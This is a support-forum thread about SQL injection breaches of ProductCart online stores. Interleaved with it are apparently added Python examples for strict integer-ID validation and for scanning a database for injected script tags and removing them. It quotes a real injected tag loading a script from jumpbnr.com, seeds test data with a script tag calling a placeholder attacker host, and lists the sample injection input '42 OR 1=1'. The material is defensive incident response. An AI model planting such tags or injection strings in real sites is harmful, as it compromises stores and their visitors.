Database Breach
ProductCart
Admin Group ProductCart Team Joined: 01-October-2003 Status: Offline Points: 135
Hi Dan,
Could you clarify which version of ProductCart you were using at the time the SQL injection attack occurred, and whether any custom forms (or customized ProductCart pages) were used on the Web site? Also, if you haven't already done so, certainly submit a support ticket.
Greg Dinger
Certified ProductCart Developers Joined: 23-September-2006 Location: United States Status: Offline Points: 238
I think another question to be asked is if there were any non-ProductCart scripts in use. The original poster of this thread got nailed through a vendor page, and not as a result of any ProductCart vulnerability. Might that be what happened here?
And why only one day's backup? Does your host not provide a deeper backup than the most recent day? What database are you running?
Hamish
Admin Group Joined: 12-October-2006 Location: United Kingdom Status: Offline Points: 56
Hi,
I've seen the email referring to SQL injection attacks and that isNumeric should not be used in custom forms. I did a quick scan of the source code and see about 50 files in the pc directory that contain isNumeric. We are running V3.11 and the email says all versions after 2.7 should be OK. Am I correct in presuming, then, that the specific uses of isNumeric that remain are fine?
ProductCart
Admin Group ProductCart Team Joined: 01-October-2003 Status: Offline Points: 135
Yes, that is correct. validNum cannot be used on numbers that are not integers. Those numbers are NEVER used in a query as an ID (e.g. a product or category ID is always an integer).
We will send out a new update in the next couple of hours. We believe we have found and fixed the vulnerability. We are just doing some final testing.
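The reply above draws the line between "numeric" and "integer ID": a value can satisfy a loose numeric test and still not be a plain integer, and only plain integers should ever reach a query as an ID. The following is an added example, not ProductCart's own validNum or any code from Early Impact, and it is written in Python rather than the store's ASP so that it runs stand-alone. The looks_numeric() helper is an illustrative stand-in for any permissive numeric test (it accepts whatever Python's float() parses) and does not reproduce VBScript's IsNumeric semantics; the product table is constructed sample data.

```python
import re
import sqlite3

# Constructed sample data standing in for a real catalogue.
PRODUCTS = [(1, "Widget"), (2, "Gadget"), (1000, "Gizmo")]

# An ID is ASCII digits only, with a bounded length: no sign, whitespace,
# exponent, decimal point, or trailing newline.
ID_PATTERN = re.compile(r"[0-9]{1,9}")


def looks_numeric(value: str) -> bool:
    """Illustrative permissive numeric test (assumption: NOT VBScript IsNumeric).

    Anything float() can parse is accepted, which is exactly the kind of
    check that lets " 42 ", "1e3", "4.2" or "nan" through as a 'number'.
    """
    try:
        float(value)
        return True
    except ValueError:
        return False


def valid_id(value: str) -> bool:
    """Strict integer-ID check: the whole string must be 1..9 digits."""
    return ID_PATTERN.fullmatch(value) is not None


def classify(values):
    """Inputs a permissive numeric test accepts but the strict ID check rejects."""
    return [v for v in values if looks_numeric(v) and not valid_id(v)]


def build_db():
    """In-memory SQLite table loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def lookup_product(conn, raw_id: str):
    """Look up a product by ID taken from a request.

    The value is rejected unless it is a plain integer, and even then it is
    passed as a bound parameter instead of being concatenated into the SQL.
    """
    if not valid_id(raw_id):
        raise ValueError(f"rejected non-integer id: {raw_id!r}")
    row = conn.execute(
        "SELECT name FROM products WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    samples = ["42", "1000", " 42 ", "1e3", "4.2", "-1", "nan", "42 OR 1=1", ""]
    print("numeric but not a valid ID:", classify(samples))
    conn = build_db()
    print(lookup_product(conn, "1000"))
```

The strict check is deliberately a whitelist of digits rather than a blacklist of SQL characters: an ID field never legitimately needs anything else, and the bound parameter means that even a value that slips past validation is treated as data by the driver.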
Hamish
Admin Group Joined: 12-October-2006 Location: United Kingdom Status: Offline Points: 56
Ok - Thanks, that's great :-)
MarkCoyle
Senior Member Joined: 06-June-2006 Location: United Kingdom Status: Offline Points: 0
Hi all

I have just been attacked with a database SQL insert overnight. This time it was: <scrrrript src=http://www.jumpbnr.com/b.js></scrrrrript> (misspelling of script is deliberate above to avoid any issues). It's a very similar situation to everyone else with an issue, though as you can see to a different site. Early Impact have been helpful and I have been able to remove it using the SQL insert query they provide. However, it also removed all flash media players from the site too, so I'm going back to Friday's backup and having that restored.

As these types of hacks seem to be on the rise, here were the symptoms I discovered when viewing the site this morning, in case anyone else is hit:

1. No product cart images were showing up, with just the URLs to the images showing.
2. When the site was loading, if I looked at the status bar I could see mention of the jumpbnr.com site, which of course shouldn't be there.

I then went to look via MySQL admin and found the string I mentioned with the script inserted into each field. I thought I was patched already but have reapplied it via FTP just in case. I will also be investigating HackerSafe as soon as things are back.

Any tips, experiences and thoughts welcome. As a user community we need to keep on top of this and track all the variants so that each of us is fully aware and can provide the latest advice.

Many kind thanks, cheers
Mark
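Mark's post describes the two halves of this kind of incident: finding which fields carry the appended script tag, and removing it without also destroying legitimate markup (his cleanup query took the flash players with it). The following added example is not the query Early Impact supplied and is not ProductCart code; it uses an in-memory SQLite database with constructed tables in place of the store's MySQL database, and the injected tag points at a placeholder host (evil.example) rather than any real site. It enumerates every TEXT column from the schema, reports the rows that contain an externally sourced script tag, and then removes only that matched tag, so an embedded `<object>` player survives.

```python
import re
import sqlite3

# Constructed stand-in for the injected tag; the host is a placeholder.
INJECTED = '<script src=http://evil.example/b.js></script>'

# A legitimate embed that an over-broad cleanup (e.g. truncating each value
# at the first '<') would destroy along with the injected tag.
LEGIT_EMBED = ('<object data="/media/player.swf" '
               'type="application/x-shockwave-flash"></object>')

# Externally sourced script tag, quoted or unquoted src, case-insensitive.
SCRIPT_TAG = re.compile(
    r'<script\s+src=["\']?https?://[^\s"\'>]+["\']?\s*>\s*</script>',
    re.IGNORECASE,
)


def build_db():
    """Constructed catalogue with the tag appended to every text field,
    mirroring the 'inserted into each field' pattern described in the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        (1, "Widget" + INJECTED, "Plain description" + INJECTED),
        (2, "Gadget" + INJECTED, LEGIT_EMBED + INJECTED),
    ])
    conn.executemany("INSERT INTO categories VALUES (?, ?)", [
        (1, "Tools" + INJECTED),
        (2, "Clean category"),
    ])
    conn.commit()
    return conn


def text_columns(conn):
    """(table, column) pairs for every TEXT column, read from the schema so
    no table is overlooked during the scan."""
    cols = []
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for row in conn.execute(f'PRAGMA table_info("{table}")'):
            # row = (cid, name, type, notnull, dflt_value, pk)
            if (row[2] or "").upper() == "TEXT":
                cols.append((table, row[1]))
    return cols


def find_injected(conn):
    """Every (table, column, rowid) whose value contains an external script tag."""
    hits = []
    for table, col in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
            if value and SCRIPT_TAG.search(value):
                hits.append((table, col, rowid))
    return hits


def clean_injected(conn):
    """Strip only the matched script tags from the affected cells; all other
    markup in the cell is left untouched. Returns the number of cells changed."""
    changed = 0
    for table, col, rowid in find_injected(conn):
        (value,) = conn.execute(
            f'SELECT "{col}" FROM "{table}" WHERE rowid = ?', (rowid,)
        ).fetchone()
        conn.execute(
            f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
            (SCRIPT_TAG.sub("", value), rowid),
        )
        changed += 1
    conn.commit()
    return changed


if __name__ == "__main__":
    conn = build_db()
    print("infected cells:", find_injected(conn))
    print("cells cleaned:", clean_injected(conn))
    print("remaining:", find_injected(conn))
```

Run the scan first and keep its report: the list of affected tables and columns is the evidence you want before touching data, and running it again after the cleanup confirms nothing was missed. The scan is also the check to repeat after restoring from backup, since a backup taken after the injection will carry the same tags.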